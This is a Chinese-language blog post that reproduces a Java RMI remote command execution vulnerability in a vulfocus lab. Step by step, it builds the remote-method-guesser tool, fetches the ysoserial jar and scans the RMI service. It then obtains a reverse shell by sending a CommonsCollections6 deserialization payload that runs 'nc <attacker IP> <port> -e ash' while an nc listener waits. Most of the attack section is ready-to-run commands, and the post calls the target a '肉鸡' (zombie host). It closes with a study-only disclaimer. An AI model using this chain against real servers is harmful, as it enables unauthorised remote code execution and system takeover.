漏洞复现-java_rmi远程命令执行

0x00 实验环境

攻击机:Ubuntu

靶场:vulfocus搭建的靶场环境

 

0x01 影响版本

使用nmap,探测到有java rmi服务的都可以测试一下:

 

0x02 漏洞复现

(1)访问存在的漏洞页面

 

 (2)首先需要安装一下这个工具

https://github.com/qtc-de/remote-method-guesser

 

git clone https://github.com/qtc-de/remote-method-guesser
cd remote-method-guesser
mvn package

出现success即可:

 

 (2)在opt目录下下载并创建文件夹目录如下所示(主要用于第5步,反弹shell):

创建opt/ysoserial/target/,然后去github上搜索这个文件:ysoserial-0.0.6-SNAPSHOT-all.jar(自己搜索即可,不管是测shiro还是啥的都有的)

 

 (3)在target目录下执行漏扫命令:

cd target
java -jar rmg-3.3.0-jar-with-dependencies.jar 肉鸡IP 肉鸡端口

 

 报错的话就加个--ssl

 发现了就可以开展测试。

 

(4)target执行数据接收命令:

java -jar rmg-3.3.0-jar-with-dependencies.jar 肉鸡IP 肉鸡端口 reg AnTrinh 攻击机IP:攻击机端口 --ssl

 

 同时攻击机也开启监听:

nc -lvvp 8989

 

 监听成功会返回"JRMIK"字样的数据

(5)反弹shell:

攻击机开三个窗口:

第一个执行:

java -jar rmg-3.3.0-jar-with-dependencies.jar 肉鸡IP 肉鸡端口 reg AnTrinh 攻击机IP:攻击机端口A --ssl

 

第二个执行:

java -jar rmg-3.3.0-jar-with-dependencies.jar 0.0.0.0 攻击机端口A listen CommonsCollections6 "nc 攻击机IP 攻击机端口B -e ash" --ssl

 

第三个执行:

nc -lvp 攻击机端口B

 成功反弹shell!

0x03 参考文献

https://github.com/qtc-de/remote-method-guesser

大哥的悉心指点。

 

0x04 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

posted @ 2021-11-24 16:47  铺哩  阅读(2745)  评论(0编辑  收藏  举报